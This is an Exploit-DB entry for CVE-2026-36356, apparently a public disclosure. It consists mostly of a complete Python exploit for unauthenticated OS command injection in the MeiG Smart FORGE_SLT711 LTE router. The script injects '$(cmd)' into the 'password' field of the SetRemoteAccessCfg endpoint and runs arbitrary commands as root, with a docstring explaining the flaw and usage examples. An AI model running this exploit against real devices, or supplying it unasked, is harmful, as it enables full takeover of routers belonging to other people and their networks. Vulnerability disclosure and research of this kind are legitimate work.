MeiG Smart FORGE_SLT711 - OS Command Injection

EDB-ID:

52581

CVE:

2026-36356

EDB Verified:

Author:

Daniil Gordeev

Type:

hardware

Exploit:   /  

Platform:

Linux

Date:

2026-05-27

Vulnerable App: 
# Exploit Title: MeiG Smart FORGE_SLT711 - OS Command Injection
# Date: 2026-05-03
# Exploit Author: Daniil Gordeev
# Vendor Homepage: http://www.meigsmart.com
# Software Link: N/A (firmware distributed via carrier channels)
# Version: Firmware MDM9607.LE.1.0-00110-STD.PROD-1 (likely all firmware versions of this product line)
# Tested on: MeiG FORGE_SLT711 (Ortel 4G LTE CPE), Qualcomm MDM9607, Linux 3.18.48
# CVE: CVE-2026-36356
"""
Unauthenticated RCE — MeiG FORGE_SLT711 (Ortel 4G LTE CPE)
GoAhead /action/SetRemoteAccessCfg OS command injection

Vuln:  JSON "password" field → sprintf("echo root:\"%s\"|chpasswd") → system()
Auth:  None (endpoint missing from route.txt auth list)
Root:  Commands execute as uid=0(root)
Type:  Blind — output not in HTTP response, use --cmd "cmd > /tmp/out" to exfil

Discovered: 2026-02-21
Tested on:  FW MDM9607.LE.1.0-00110-STD.PROD-1
"""

import argparse
import json
import sys
import urllib.request
import urllib.error

def exploit(ip: str, cmd: str, port: int = 80, timeout: int = 10) -> bool:
    url = f"http://{ip}:{port}/action/SetRemoteAccessCfg"
    payload = json.dumps({"password": f"$({cmd})"})

    req = urllib.request.Request(
        url,
        data=payload.encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )

    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode()
            data = json.loads(body)
            if data.get("retcode") == 0:
                print(f"[+] retcode:0 — command executed as root")
                return True
            else:
                print(f"[-] Unexpected response: {body}")
                return False
    except urllib.error.URLError as e:
        print(f"[-] Connection failed: {e}")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def main():
    p = argparse.ArgumentParser(
        description="MeiG SLT711 GoAhead unauthenticated RCE (blind)",
        epilog="Example: %(prog)s --ip 192.168.1.1 --cmd 'id > /tmp/out'",
    )
    p.add_argument("--ip", default="192.168.1.1", help="Target IP (default: 192.168.1.1)")
    p.add_argument("--port", type=int, default=80, help="Target port (default: 80)")
    p.add_argument("--cmd", required=True, help="Command to execute as root (blind, no output returned)")
    p.add_argument("--timeout", type=int, default=10, help="HTTP timeout in seconds (default: 10)")
    args = p.parse_args()

    print(f"[*] Target:  {args.ip}:{args.port}")
    print(f"[*] Command: {args.cmd}")
    print(f"[*] Payload: $({{cmd}}) inside password field")

    ok = exploit(args.ip, args.cmd, args.port, args.timeout)
    sys.exit(0 if ok else 1)

if __name__ == "__main__":
    main()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services